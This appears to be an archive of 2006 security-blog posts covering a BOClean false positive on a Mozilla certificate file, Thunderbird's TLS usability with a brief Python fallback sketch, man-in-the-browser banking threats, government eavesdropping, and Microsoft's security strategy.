    On Saturday, July 22, 2006 we added a "signature" to BOClean called "QUOVADIS" based upon a submission to us by one of our external malware research partners. The submission was reviewed by one of our own malware analysts and was determined to be extremely suspicious because it modified the Windows registry "trusted certificates" store and that's always a "no-no." The fact that it was submitted out of context to its origin unfortunately led us to believe by its design and nature that it was a Mozilla hijacker since it appeared to be legitimate and yet didn't pass the "smell test" because of its internal contents and behavior. We encounter similar "infections" often. The decision was "unfortunately" made to err on the side of caution and INCLUDE it in BOClean's update of that day.

    Within a little over an hour, based upon numerous complaints of a "false positive," we removed detection for the NSSCKBI.DLL file as QUOVADIS malware. Now, we're not quite sure if there actually isn't an issue there, though apparently not one that rises to the level of an actual piece of malware since Mozilla's browsers are "trusted." As is the case with any "surprise" here, a post mortem remains in progress on our end to bring closure and internal policy changes to prevent any future "unfortunate events" such as this.

    Mozilla's NSSCKBI.DLL file contains a number of "secure sockets layer" (SSL) certificates, including certificates from several unknown and possibly dubious "certifying authorities." ...

    I don't fully understand that, but it reads as though someone complained about the Quovadis root key (which I understand to be a valid CA), and the security firm blocked the whole root list in the DLL? Either way, "privsoft" seems to have been disconnected from the net as we know it; the information on who is a valid CA or not is widely available on Mozilla's pages. And an email to Frank would have sorted it out...

    It will be interesting to see just what this complaint really was -- an enterprising CA engaged in corporate provocation? Bad security firms dropping the bundle like they did with Sony? Or is the Quovadis root really involved in some sense in a malicious change to the Windows registry? Keep it up, guys, us ignorant journos and our readers want scandal, intrigue, and see if you can do something about spies and tits for us too, please!

    What else? Well, I've also seen a demo of the latest generation attacks against Firefox (if you read the blog, you know what I mean). Unfortunately, when it was shown around, the banks said "oh-my-god, who have you shown this to? you can't reveal this..."

    This is a direct case of fear of fingerpointing, which I outline in my paper on "The Market for Silver Bullets."

    Should such things be published? The answer is YES! Firstly, the attackers already have this; they are smarter and more focussed, and if they only appear not to have attacked, it is because they have other things to do that make them money. Focus, ROI, two easy words. (As if to underscore this point, first reports have it that European banks are being attacked with an innovative MITB that asks for two TANs, so far targeted at IE only.)

    Did I say that the attackers were smarter than the banks? Yes, I did. Get used to it.

    Secondly, consider the *user* community, which includes all Alices and Bobs, all Grandmas, all banks in countries where they haven't figured it out yet (e.g., the US of A), and all the other non-bank suppliers who are about to be surprised at how far this threat reaches.

    They ... heck ... *we all need this information* so that we can all assess risks going forward. It may surprise the banks, but it is their customers' right to know when it is unsafe to engage in online banking.

    Why this discrepancy? The banks do not carry the costs of risks to others, so they don't care. They only care about their own costs, which in the end are surprisingly limited, surprisingly manageable, even in the American phishing epidemic.

    Why then are the banks so fiercely protective of their security weaknesses? Because embarrassment in the press is far more costly than any mere security breach! As they bear these costs themselves, directly, and the costs spread contagiously through the industry, they are vulnerable to what I call fingerpointing. This then drives them to render all security issues under a secrecy order, industry wide. For more understanding of why banks are not particularly concerned about the user's risks, read the paper.

    Which leaves me wondering where Firefox is heading, market-wise. If anything, things like GreaseMonkey and the spectacular plugins market are making Firefox a more likely target for security concerns. I've also noticed a bit of a ground shift in talk over at Mozilla -- they no longer refer to Firefox as more secure than IE. That is wise, as it seems that Microsoft are doing more in that area. If the IE and Vista teams succeed in making a difference, Firefox can expect to be hammered into the ground.

    Which isn't necessarily bad. Mozilla are leaning towards a mission of "choice" in tools, which is no bad mission. It's simply not necessary or smart to be all things to all people; it is better to concentrate on where we can make a difference.

    But it does leave a hole in the market for a security browser. And it raises the question for the FC blog of revising our top tips for security. Any call?

    Posted by iang at 08:40 AM | Comments (4) | TrackBack

    July 23, 2006

    Case Study: Thunderbird's brittle security as proof of Iang's 3rd Hypothesis in secure design: there is only one mode, and it's secure.

    In talking with Hagai, it was suggested that I try using the TLS/IMAP capabilities of Thunderbird, which I turned on (it's been a year or two since the last time I tried it). Unfortunately, nothing happened. Nothing positive, nothing negative. Cue in here a long debate about whether it was working or not, and how there should be a status display, at least, and various other remedies, at most.

    A week later, the cleaning lady came in and cleaned up my desk. This process, for her, also involves unpowering the machine. Darn, normally I leave it on for ever, like a couple of months or so.

    On restarting everything, Thunderbird could not connect to the mail servers. Our earlier mystery is thus resolved - the settings don't take effect until restart. Doh!

    So, how then did Thunderbird handle? Not so well, but it may have got there in the end. This gives me a chance to do a sort of case study in 1990s design weaknesses, a critique in (un)usability, leading to design principles updated for this decade.

    To predict the punch line, the big result is that there should only be one mode, and it should be secure. To get there more slowly, here's what I observed:

    Firstly, Thunderbird grumbled about the certificate being in the wrong name. I got my negative signal, and I knew that there was something working! Hooray!

    But, then it turned out that Thunderbird still could not connect, because "You have chosen secure authentication, but this server does not offer it. Therefore you cannot log in..." Or somesuch. Then I had to go find that option and turn it off. This had to be done for all mail accounts, one by one.

    Then it worked. Well, I *guess* it did... because funnily enough it already had the mail, and again had not evidenced any difference.

    Let's break this up into point form. Further, let's also assume that all competing products are as bad or worse. I actually *choose* Thunderbird as my preferred email client, over say Kmail. So it's not as bad as it sounds; I'm not "abandoning Thunderbird", I'm just not getting much security benefit from it, and I'm not recommending it to others for security purposes.

    1. No caching of certs. There is no ability to say "Yes, use that cert for ever, I do know that the ISP is not the same name as my domain name, dammit!!!!" This is an old debate; in the PKI world, they do not subscribe to the theory that the user knows more than any CA about her ISP. One demerit for flat earth fantasies.
    2. No display anywhere that tells me what the status of the security is. One demerit. (Keep in mind that this will only be useful for us "qualified cryptoplumbers" who know what the display means.)
    3. I can choose "secure authentication" and I can choose "secure connection." As a dumb user, I have no idea what that means, either of them. One demerit.
    4. If I turn one of those ON, and it is not available, it works. Until it doesn't -- it won't connect at some later time and it tells me to turn it off. So as a user I have a confusing choice of several options, but ramifications that do not become clear until later.

      Another demerit: multiple options with no clear relationship, but unfortunate consequences.

    5. Once it goes wrong, I have to navigate from a popup telling me something strange, across to a series of boxes in some other strange area, and turn off the exact setting that I was told to, if I can remember what was on the popup. Another demerit.
    6. All this took about 5 minutes. It took longer to do the setting up of some security options than it takes to download, install, and initiate an encrypted VoIP call over Skype with someone who has *never used Skype before*. I know that because the previous night I had two newbies going with Skype in 3 minutes each, just by talking them through it via some other chat program.
    7. Normal users will probably turn it all off, as they won't understand what's really happening, and "I need my mail, darnit!"

    (So, we now start to see what "need" means when used by users... it means "I need my email and I'll switch the darned security rubbish off and/or move to another system / supplier / etc.".)

    8. This system is *only useable by computer experts.* The only reason I was able to "quickly" sort this out was because I knew (as an experienced cryptoplumber) exactly what it was trying to do. I know that TLS requires a cert at the other end, *and* there is a potential client-side cert. But without that knowledge, a user would be lost. TLS security as delivered here is not really up to use by ordinary people - hence "brittle."

    We can conclude that this is a nightmare in terms of:

    • usability.
    • implementation.
    • design.
    • standards.

    Let's put this in context: when this system was designed, we didn't have the knowledge we have now. Thunderbird's security concept is at least 3 years old, probably 8-10 years old. Since those years have passed, we've got phishing, usability studies, opportunistic crypto, successful user-level cryptoapps (two, now), and a large body of research that tells us how to do it properly.

    We know way more than we did 3 years ago - which was when I started on phishing. (FTR, I suggested visit counts! How hokey!)

    Having got the apologies off our chest, let's get to the serious slamming: If you look at any minor mods to the Thunderbird TLS-based security, like an extra popup, or extra info or displays, you still end up with a mess. E.g., Hagai suggested that there should be an icon to display what is going on - but that only helps *me*, being an experienced user who knows exactly what it is trying to tell me. I know what is meant by 'secure authentication' but if you ask grandma, she'll offer you some carrot cake and say "yes, dear. now have some of this, I grew the carrots myself!"

    (And, in so doing, she'll prove herself wiser than any of us. And she grows carrots!)

    Pigs cannot be improved by putting them in dresses - this security system is a pig and won't be improved by frills.

    The *design* is completely backwards, and all it serves to do is frustrate the use of the system. The PKI view is that the architecture is in place for good reasons, and therefore the user should be instructed and led along that system path. Hence,

    "We need to educate the users better."

    That is a truly utterly disastrous recommendation. No! Firstly, the system is wrong, for reasons that we can skip today. Secondly, the technical choices being offered to the users are beyond their capabilities. This can never be "educated." Thirdly, it's a totally inefficient use of the user's time. Fourthly, the end effect is that most users will not ever get the benefit.

    (That would be a mighty fine survey -- how many users get the benefit of TLS security in Thunderbird? If it is less than 10%, that's a failure.)

    The system should be reversed in logic. It should automatically achieve what it can achieve and then simply display somewhere how far it got:

    1. Try for the best, which might be secure auth, and then click into that. Display "Secure Auth" if it got that far.
    2. If that fails, then, fallback to second best: try the "Secure Conn" mode, and display that on success.
    3. Or finally, fall back to password mode, and display "Password only. Sorry."

    The buttons to turn these modes on are totally unnecessary. We have computers to figure that sort of nonsense out.
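    For the avoidance of doubt, here's what "the computer figures it out" looks like -- a sketch in Python, with names invented by me rather than drawn from Thunderbird: try the best mode first, fall back in order, and simply *display* where we landed.

        def connect(server) -> str:
            # Try the best mode first; fall back in order; return what we achieved
            # so the status bar can display it. No buttons anywhere.
            for label, attempt in [
                ("Secure Auth", server.try_secure_auth),
                ("Secure Conn", server.try_secure_connection),
                ("Password only. Sorry.", server.try_password),
            ]:
                if attempt():
                    return label
            raise ConnectionError("could not reach the server at all")

        class DemoServer:
            # A stand-in server that only offers the middle option.
            def try_secure_auth(self) -> bool: return False
            def try_secure_connection(self) -> bool: return True
            def try_password(self) -> bool: return True

        print(connect(DemoServer()))  # -> Secure Conn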

    Even the above is not the best way. Fallback modes are difficult to get right. They are very expensive, brittle even. (But, they are better - far far far cheaper - than asking the user to make those choices.) There is still one way to improve on this!

    Hence, after 5 demerits and a handful of higher-level critiques, we get to the punchline:

    To improve, there should only be one mode. And that mode is secure. There should be only one mode, because that means you can eliminate the fallback code. Code that falls back is probably twice as large as code that does not fall back. Twice as brittle, four times as many customer complaints. I speak from experience...

    The principle, which I call my 3rd Hypothesis in Secure Protocol Design, reads like this:

    There is only one mode, and it is secure.

    If you compare and contrast that principle with all the above, you'll find that all the above bugs magically disappear. In fact, a whole lot of your life suddenly becomes much better.
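    And the same client under the Hypothesis -- again a sketch, not anyone's shipping code. One mode, no ladder, no buttons; if the secure mode fails, the connection fails, loudly:

        def connect_one_mode(server) -> str:
            # No fallback ladder: roughly half the code, and none of the demerits.
            if not server.try_secure_auth():
                raise ConnectionError("no secure mode -- refusing to fall back")
            return "Secure"

        # e.g., with the DemoServer from the sketch above, this refuses to connect
        # rather than silently degrading to "Password only."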

    Now, again, let's drag in some wider context. It is interesting that email can never ever get away from the fact that it will always have this sucky insecure mode. Several of them, indeed. So we may never get away from fallbacks, for email at least.

    That unfortunate legacy should be considered as the reality that clashes with the Hypothesis. It is email that breaches the Hypothesis, and it and all of us suffer for it.

    There is no use bemoaning the historical disaster that is email. But: new designs can and will get it right. Skype has adopted this Hypothesis, and it took over - it owns VoIP space in part because it delivered security without the cost. SSH did exactly the same, before.

    In time, other communication designs such as for IM/chat and emerging methods will adopt Hypothesis #3, and they will compete with Skype. Some of the mail systems (STARTTLS?) have also adopted it, and where they do, they do very well, allegedly.

    (Nobody can compete with SSH, because we only need one open source product there - the task is so well defined there isn't any room for innovation. Well, that's not exactly true - there are at least two innovations coming down the pipeline that I know of but they both embrace and extend. But that's topic drift.)

    Posted by iang at 07:19 AM | Comments (10) | TrackBack

    July 02, 2006

    Apple to help Microsoft with "security neutrality"?

    Peter points to news that Apple are moving (back) to a proprietary OS. It's not entirely clear as yet, but it looks like the Intel Mac OSX will go proprietary.

    Apple still publishes the source code for OS X's commands and utilities and laudably goes several extra miles by open sourcing internally developed technologies such as QuickTime Streaming Server and Bonjour zero-config networking.

    The source code required to build a customized OS X kernel, however, is gone. Apple says that the state of an OS X-compatible open source x86 Darwin kernel is "in flux."

    The article waxes on about performance and tuning and the like, but I worry about security. The reason this blog's "Top Tip #1" for your security is to buy a Mac is not because I like them, but because they are relatively secure. Relative being the operative word here -- for best user-bang-for-buck, they are the way to go if security is your need.

    The marketing people will likely waffle on about how they can be just as secure with a proprietary OS as without. "Honest Injun!"

    Nonsense. Here's what happens. Once the public scrutiny goes, the internal food fights start. Once the OS team no longer has the easy excuse of "that's insecure and _someone will notice_," all of the application teams' marketing directors will be lining up to throw old eggs and rotten tomatoes at the OS team.

    Going open source doesn't make it secure -- you've still got to do the hard work. It only makes it possible to go secure. And without it, it is unlikely that you can be secure in a complex, multi-application, mammoth user base scenario like Apple's, no matter how good your people are. Open source works like governance in security: it's the feedback mechanism that keeps you honest.

    If Apple withdraws the commitment to open, honest security, I'd give it five years, and they won't be able to open it again. They'll have caught up with Microsoft, the OS will be riddled inside with strange and scary artifacts, and that nice shiny apple will be skin only, the worms having eaten the core away.

    Still, one supposes that the other guys need a "level playing field." Or perhaps we should call it "security neutrality" to use the current inanity. There's a thought -- Adam is going to work for Microsoft security. Wouldn't it be ironic if Microsoft were to announce an open source policy ... beyond the Chinese government that is ... and take another bite out of the apple?

    Posted by iang at 07:53 AM | Comments (4) | TrackBack

    June 26, 2006

    Sealand - more pictures

    Fearghas points to more graphical evidence of risk practices from the Lifeboat station in Harwich.

    For those bemused by this attention -- a brief rundown of "Roughs Tower," a.k.a. Sealand. Some 5 or so years ago, some colourful libertarian / cypherpunk elements started a "data haven" called HavenCo running in this "claimed country". Rumour has it that after the ISP crashed and burnt, all the servers were moved up the Thames estuary to London.

    Not wishing to enter into the discussion of whether this place was *MORE* risky or less risky ... Chandler asks:

    What kind of country doesn't have a fire department? One that doesn't plan on having a fire, as evidenced by the fact that Sealand/HavenCo didn't have fire insurance.

    Well, as they were a separate jurisdiction, they probably hadn't got around to (ahem) legislating an insurance act? Or were you thinking of popping into the local office in Harwich and picking up a home owner's policy?

    :) More pictures on site.

    Posted by iang at 07:14 PM | Comments (1) | TrackBack

    June 25, 2006

    FC++3 - Concepts against Man-in-the-Browser Attacks

    This emerging threat has sent a wave of fear through the banks. Different strategies have been formulated and discussed in depth, and just this month the first roll-outs have been seen in Germany and Austria. This information cries out for release, as there are probably 10,000 other banks out there that would otherwise have to go through and do the work again.

    Philipp Gühring has collected the current best understanding together in a position paper entitled "Concepts against Man-in-the-Browser Attacks."

    Abstract. A new threat is emerging that attacks browsers by means of trojan horses. The new breed of trojan horses can modify the transactions on-the-fly, as they are formed in browsers, and still display the user's intended transaction to her. Structurally, they are a man-in-the-middle attack between the user and the security mechanisms of the browser. Distinct from phishing attacks, which rely upon similar but fraudulent websites, these new attacks cannot be detected by the user at all, as they use real services, the user is correctly logged-in as normal, and there is no difference to be seen.

    The WYSIWYG concept of the browser is successfully broken. No advanced authentication method (PIN, TAN, iTAN, Client certificates, Secure-ID, SmartCards, Class3 Readers, OTP, ...) can defend against these attacks, because the attacks are working on the transaction level, not on the authentication level. PKI and other security measures are simply bypassed, and are therefore rendered obsolete.
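    One family of countermeasures in this territory confirms the transaction, rather than the login, over a channel the browser cannot touch. Here's a minimal sketch - the names and flow are my own illustration, not taken from the paper:

        import hmac, hashlib

        def confirmation_code(key: bytes, dest_account: str, amount: str) -> str:
            # The bank computes a short code over the transaction it
            # actually received, and sends it with the details to the
            # user's phone. The user checks the details match what she
            # typed before releasing the code. A trojan in the browser
            # can rewrite the transaction, but not the out-of-band copy.
            msg = ("%s|%s" % (dest_account, amount)).encode()
            return hmac.new(key, msg, hashlib.sha256).hexdigest()[:8]

        key = b"per-customer secret, provisioned out of band"
        print("SMS: confirm payment of 50.00 to account 123-456 with code",
              confirmation_code(key, "123-456", "50.00"))

    The security rests on the second channel, not on the code itself: the user must actually read the details before approving.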

    If you are not aware of these emerging threats, you need to be. You can either get it from sellers of private information or you can get it from open source information sharing circles like FC++ !

    Posted by iang at 12:43 PM | Comments (8) | TrackBack

    FC++3 - The Market for Silver Bullets

    In this paper I dip into the esoteric theory of insufficient markets, as pioneered by Nobel Laureate Michael Spence, to discover why security is so difficult. The results are worse than expected - I label the market as one of silver bullets. Yes, there are things that can be done, but they aren't the things that people have been suggesting.

    This paper is a bit tough - it is for the serious student of econ & security. Far from being the pragmatic "fix this now" demands of Philipp Gühring and the "rewrite it all" diagnosis of Mark Miller, it offers a framework of why we need this information out there in the public sphere.

    What is security?

    As an economic `good', security is now recognised as being one for which our knowledge is poor. As with safety goods, events of utility tend to be destructive, yet unlike safety goods, the performance of the good is very hard to test. The roles of participants are complicated by the inclusion of aggressive attackers, and buyers and sellers that interchange.

    We hypothesize that security is a good with insufficient information, and reject the assumption that security fits in the market for goods with asymmetric information. Security can be viewed as in a market where neither buyer nor seller has sufficient information to be able to make a rational buying decision. These characteristics lead to the emergence of a market in silver bullets, as participants herd in search of best practices, a common set of goods that arises more to reduce the costs of externalities than to achieve benefits in security itself.

    Does it really show that the security market is one of silver bullets, and best practices are bad, not good? You be the judge! That's what we do in FC++, put you in the peer-review critic's seat.

    Posted by iang at 11:53 AM | Comments (1) | TrackBack

    June 20, 2006

    Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security

    Mark points to Noam Eppel. If you haven't subscribed to the "total collapse of security and humanity as we know it" theory, then I'd encourage you to read "Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security." Even just skimming the list of headline failures will help :)

    They say if you drop a frog in a pot of boiling water, it will, of course, frantically try to clamber out. But if you place it gently in a pot of tepid water and turn the heat on low, it will float there quite placidly. As you turn up the heat, the frog will sink into a tranquil stupor and before long, with a smile on its face, it will unresistingly allow itself to be boiled to death. The security industry is much like that frog; completely and uncontrollably in disarray - yet we tolerate it since we are used to it.

    It is time to admit what many security professionals already know: We, as security professionals, are drastically failing ourselves, our community, and the people we are meant to protect. ...

    You may not agree with the central claim, but at least the article clearly lays out the evidence, from top to bottom. It is important to understand the claim and its foundations, even if you don't agree, because much of the new work that is being done is based on the complete replacement of large chunks of old wisdom. This only makes sense if we can claim that the old ways were wrong.

    (If you want more, here's a reference: I broached this subject in a recent JIBC article wherein I assumed security was a failure, and went on to list some of the open areas of research.)

    Posted by iang at 07:37 AM | Comments (0) | TrackBack

    June 19, 2006

    Black Helicopter #2 (ThreatWatch) - It's official - Internet Eavesdropping is now a present danger!

    A group of American cryptographers and Internet engineers has criticised the FCC for issuing an order that amounts to a wiretap instruction for all VoIP providers.

    For many people, Voice over Internet Protocol (VoIP) looks like a nimble way of using a computer to make phone calls. Download the software, pick an identifier and then wherever there is an Internet connection, you can make a phone call. From this perspective, it makes perfect sense that anything that can be done with a telephone, including the graceful accommodation of wiretapping, should be able to be done readily with VoIP as well.

    The FCC has issued an order for all "interconnected" and all broadband access VoIP services to comply with the Communications Assistance for Law Enforcement Act (CALEA) -- without specific regulations on what compliance would mean. The FBI has suggested that CALEA should apply to all forms of VoIP, regardless of the technology involved in the VoIP implementation.

    In brief the crypto community's complaint is that it is very difficult to implement such enforced access, and to do so may introduce risks. I certainly agree with the claim of risks, as any system that has confused requirements becomes brittle. But I wouldn't bet on a company not coming out with a solution to these issues, if the right way to place the money was found. I've previously pointed out that Skype left in a Centralised Vulnerability Party (CVP, sometimes called a TTP), and last week we were reminded of the PGP Inc blunder by strange and bewildering news over in Mozilla's camp.

    So where are we? The NSA has opened up the ability to pen-trace all US phones, more or less. Anyone who believes this is as far as it goes must be disconnected from the net. The EFF's suit alleges special boxes that split out the backbone fibre and suck it down to Maryland in real time. The FBI has got the FCC to order all the VoIP suppliers into line. Mighty Skype has been brought to heel by the mighty dollar, so it's only a phone call away.

    Over in other countries - where are they, again? - there is some evidence that police in European countries have routine access to all cellphone records. There is other evidence that the EU may already have provided the same call records to the US (but not the other way around, how peculiar of those otherwise charming Europeans) in much the same way as last week the EU were found to be illegally passing private data on air travellers. To bring this into perspective, China of course leads the *public* battle for most prominent and open eavesdropper with their Cisco Specials, but one wonders whether they would be actually somewhat embarrassed if their capabilities were audited and compared?

    If you are a citizen of any country, it seems, you need not feel proud. What can we conclude?

    1. Eavesdropping has now moved to a real threat for at least email and VoIP, in some sense or other.
    2. Can we say that it is a validated threat? No, I think not. We have not measured the frequency and cost levels so we have no actuarial picture. We know it is present, but we don't know how big it is. I'll write more on this shortly.
    3. The *who* that is doing it is no longer the secure, secret world of the spooks who aren't interested in you. The who now includes the various other agencies, and they *are* interested in you.
    4. Which means we are already in a world of widespread sharing across a wide range of government agencies. (As if sharing intel has not been a headline since 9/11 !)
    5. It is only one step from open commercial access. Albeit almost certainly illegal, there isn't likely to be anything you can do about illegally shared data, because it is the very agents of the law who are responsible for the breach, and they will utter the defence of "national security" to you, and the price to your attacker.
    6. An assault on crypto can't be that far off. The crypto wars are either already here again, or so close we can smell them.
    7. We are not arguing here, today, whether this is a good thing for the mission to keep us safe from terrorists, or a bad thing. Which is just as well, because it appears that when they are given the guy's head on a plate, the law enforcement officers still prefer to send out for takeaway.

    My prediction #1 for 2006, that government will charge into cyberspace in a big way, is pretty much confirmed at this stage. Obviously this was happening all along, so it was going to come out. How important is this to you the individual? Here's an answer: quite important. And here's some evidence:

    What is Political Intelligence? Political intelligence is information collected by the government about individuals and groups. Files secured under the Freedom of Information Act disclose that government officials have long been interested in all forms of data. Information gathered by government agents ranges from the most personal data about sexual liaisons and preferences to estimates of the strength of groups opposing U.S. policies. Over the years, groups and individuals have developed various ways of limiting the collection of information and preventing such intelligence gathering from harming their work.

    It has now become routine for political activists -- those expressing their rights under democracy -- to be investigated by the FBI. In what is a blowback to the days of J. Edgar Hoover, these activists are now routinely advising their own people on how to lawfully defend themselves.

    Hence the pamphlet above. There are two reasons for gathering information on 'sexual liaisons and preferences.' Firstly, blackmail or extortion. Once an investigator has secret information on someone, the investigator can blackmail -- reveal that information -- in order to extort the victim to turn on someone else. Secondly, there may be some act that is against the law somewhere, which gives a really easy weapon against the person. Actually, they are both the same reason.

    If there is anyone on the planet who thinks that such information shouldn't be protected, then I personally choose not to be persuaded by that person's logic ("I've got nothing to hide"), and I believe that we now have a danger. It's not only from the harvesting by the various authorities:

    Peter G, 41, asked for a divorce from his wife of six years, Lori G, 38, in March 2001. ... Lori G filed a counterclaim alleging the following: <snip...> and wiretapping. The wiretapping charges are what make this unfortunate case relevant to Police Blotter. ... But Peter admitted to "wiretapping" Lori's computer.

    The description is general: Peter used an unspecified monitoring device to track his wife's computer transactions and record her e-mails. Lori was granted $7,500 on the wiretapping claim. ...

    This is hardly the first time computer monitoring claims have surfaced in marital spats. As previously reported by CNET News.com, a Florida court ruled last year that a wife who installed spyware on her husband's computer to secretly record evidence of an extramarital affair violated state law.

    Some hints on how to deal with that danger. Skype is probably good for the short term in talking to your loved one while he still loves you, notwithstanding their CVP, as that involves an expensive, actively aggressive act which incurs a risk for the attacker. However, try to agree to keep the message history off - you have to trust each other on this, as your node and your partner's node remain the greater danger. Email remains poor because of the rather horrible integration of crypto into standard clients - so use Skype or other protected chat tools.

    Oh, and buy a Mac laptop. Although we do expect Macs to come under increased attention as they garner more market share, there is still a benefit in being part of a smaller population, and the Mac OS is based on Unix and BSD, which has approximately 30 years of attention to security. Windows has approximately 3 years, and that makes a big difference.

    (Disclosure: I do not own a Mac myself, but I do sometimes use one. I hate the GUI, and the MacMini keyboards are trash.)

    Posted by iang at 01:20 PM | Comments (1) | TrackBack

    June 17, 2006

    Microsoft - will they bungle the security game?

    I suspect Microsoft are going to blow the security game. Here's the evidence:

    A recent Microsoft update to Windows XP, which modifies the tool that verifies the "validity" of XP installations to ensure that they are not illicit, may itself be considered to be spyware under commonly accepted definitions.

    The new version of the "Microsoft Genuine Advantage" tool reportedly will repeatedly nag users of systems it declares to be invalid, and will then apparently deny such users various "non-critical" updates. Apparently various parties have already found ways to bypass this tool, though the effects of this on later updating capabilities remain to be seen.

    However, I've noted a much more serious issue on local XP systems, all of which are legit and pass the MS validity tests with flying colors. It appears that even on such systems, the MS tool will now attempt to contact Microsoft over the Internet *every time you boot*. At least, I'm seeing these contacts on every boot after the tool update so far, and I've allowed them to proceed to completion each time. Perhaps it stops after some number of boots, but there's no indication of such a limit so far. The connections occur even if you do not have Windows "automatic update" enabled. ...

    That's about XP, their older product. Here's what they are trying to address:

    Microsoft (Nasdaq: MSFT) on Monday revealed the results of a 15-month test of its Malicious Software Removal Tool. The utility that seeks out and destroys malware reported malicious programs, or bots, on six out of 10 Windows computers it examined.

    And here's the problem. Microsoft are responsible for the old mess, and to their credit, they are in some sense or other recognising the size of the problem by reporting on it, above. (They can't go too far, otherwise they'll be dealing with the MOACAS - mother of all class action suits.)

    So they are doing what others -- Symantec, Kaspersky, etc -- have developed over decades to fix the product: putting in anti-virus tools and pretending that these are the latest must-have fashion accessories.

    Can you say conflict of interest? On the superficial level, we have these problems:

    1. They are making money off the problems they delivered last time. Well, sometimes that is good, but not always, not when everyone knows it.
    2. Any problem they fix is subject to approval and re-interpretation by the publicity arms. That is, you can't fix a problem if you have to reveal it, and the PR people say it's too dangerous to reveal.
    3. Their efforts to fix these problems are subject to capture by the sales arm. So this is why you are seeing efforts like the above. It's not that the sales arm says "you must make the product sell more Vista..." No, it is more subtle than that. It is as if a thousand helping hands turn up to help if the solution helps Vista sales, and those same thousand hands hold little razors that take little nicks out of you if your solution slows down sales of Vista.

    But even deeper than that, we have the dangers of feedback loops generating perverse solutions. The anti-virus companies had at least the market to keep them honest. They were symbiotes, feeding off the host, like those little fish that follow sharks. The rewards and punishments were fairly clear.

    Microsoft will not have the market to keep itself honest: it is the market for the OS, it is the owner of the user's computer, it owns the mess, and it is now the fixer of the mess. That's not to say that they won't get it right, but that there is no negative feedback force in this "I'm my own symbiote" market to stop perverse solutions and kill them before they do too much damage. And there are positive feedback forces, as listed above.

    Not to mention brittle. These complicated systems could result in quite serious DOS attacks. Seen on Risks / slashdot:

    An anonymous Slashdot user gives virus writers a worrying idea: "A virus could use one of the 'Product-Key Changer' scripts ... to install a pirated product key on every infected computer (wiping all traces of the original key). This would render millions of genuine installations indistinguishable from pirated installations. What a mess for Microsoft! They would have to immediately 'kill forever' the WGA helper, and maybe even remove the WGA check on Windows Update. Such a virus would be a hard lesson to learn for the writers of all kinds of automated 'genuine' checks."

    What about Vista? Well, the signs are that Vista is constructed along the same lines. Same thinking, same techniques. So at the same time as Microsoft are swallowing the little cleaner fish in the old XP market, they are bringing out a new shark with no cleaning fish.

    If I was responsible for a doze network, I'd be terrified of being the first penguin. I'd really want some other penguin over on the other side of town to play with the shark for a year or so.

    Mike Nash, who was security czar over at Microsoft for the period of the Vista development, now steps aside, and here's what incoming Ben Fathi says when probed on the future (which is post Vista):

    Q: Is there anything that you can tell us about what's on the horizon when it comes to security at Microsoft?

    We are concentrating on what Bill Gates talked about in February at the RSA Conference. There are four areas to our security vision: a trust ecosystem; engineering for security; simplicity; and fundamentally secure platforms. We have done a lot of investments in all of those areas, and I'm going to continue those investments.

    Look at, for example, the trust ecosystem, the first step in that was delivering Active Directory Federation Services in Windows Server 2003 R2. The next step, and we've done some of this in Vista, is adding things like certificate lifecycle management, so enterprises can manage digital certificates. InfoCard is also an example.

    In terms of engineering for security, that's all about the Security Development Lifecycle. It applies to all of our products, not just Windows, obviously. But what we're finding is that we need to make the SDL (Security Development Lifecycle) more agile with things like MSN and Windows Live having very short development cycles and needing quick updating.

    Well, at least Microsoft has a Security Czar - many organisations do not. And, he's been brave (foolhardy?) enough to state what he's aiming for:

    Finally, a fundamentally secured platform, that's the part I feel I will be reviewed on. It is about taking a lot of our investments in the platform itself and Windows and improving them.

    I think I predicted a while back that Microsoft would have to adopt another OS in order to save their security situation. Like Apple did. Microsoft are also betting big on CardSpace (was InfoCard) saving their security bacon. I wrote long and probably scathingly about that a few months back. Here's some more skepticism:

    Microsoft is emphasizing the ease of adoption for CardSpace, which is a nice way of saying that they're begging developers to get involved. For a proof of concept project, says Turner, all it takes to use the technology is to embed a bit of XML in your Web site, and to update the sign-in page. A three-line code change is all that's necessary to change from self-issued to managed infocards.

    And, they stress, all this can be done with non-Microsoft technologies, including Java and Linux. "The only Microsoft bit here is Infocard," said Turner.

    CardSpace will be built into Windows Vista, and will be available for Windows XP and Windows Server 2003, the company says. (Betas and CTPs are available here.) According to Turner, Microsoft is pushing for a CardSpace RTM (Release to Manufacturing) "in just a few months."

    For CardSpace to succeed, it will need buy-in from more than site developers. The company is exhorting financial firms and other such organizations — pleading might be a better word — to participate in the managed card program as Identity Providers.

    It's probably fair to guess that companies are not going to sign up with gay abandon like they did with the last lot. It's also a no-brainer that anyone who suggests that it only takes a three-line code change in a website is someone who's never actually done it. And allowing Microsoft to manage the Identity that closely is not something that financial providers are going to be comfortable with.

    Unfortunately, the bottom line is that it doesn't actually solve the problem we are currently looking at. The emerging threat is one of authorisation, not authentication -- Identity is the wrong problem. So unless CardSpace can address authorisation in some compelling way, it's back to the old game of rolling out those SecurID tokens and discovering that the attacker bypasses them as well. That's not out of the question, but given the complexity of understanding what all that means, I don't have high hopes.

    So my call for the moment - CardSpace is version 3 of this story, and the only benefit will be if it takes Microsoft closer to version 4.

    But given the number of cards they have stacked up in their hands at the moment, CardSpace could be overwhelmed even if it does work out. Unfortunately for Microsoft, others are waiting, this time, and they've had their 3 years of re-write opportunity.

    Posted by iang at 12:47 PM | Comments (3) | TrackBack

    June 10, 2006

    Naked Payments III - the well-dressed bank

    Bigmac writes: The next levels in scams (sorry, it's in single Dutch, translations welcome):

    A very well set up advance fee scam where they not only had a fake ING website but actually two complete ING offices, next to real ING offices; one at Schiphol, one close to the old headquarters (? don't know where).

    Did you hear the one about the fake NEC factory in Taiwan? They just pretended to be NEC but actually sold product, did R&D, everything.

    (The fake NEC factory was written up on Bruce Schneier's blog, I'll chase the link when I get back. Back in times long past, the Japanese went one better - they named a region Usa so they could stamp "MADE IN USA" on their packages. Life goes on in the IP theft department...)

    Posted by iang at 09:14 PM | Comments (1) | TrackBack

    May 26, 2006

    How much is all my email worth?

    I have a research question. How much is all my email worth? As a risk / threat / management question.

    Of course, that's a difficult thing to price. Normally we would price a thing by checking the market for the thing. So what market deals with such things?

    We could look at the various black markets, but they are more focussed on specific things, not massive data. Sorry, bad guys, not your day.

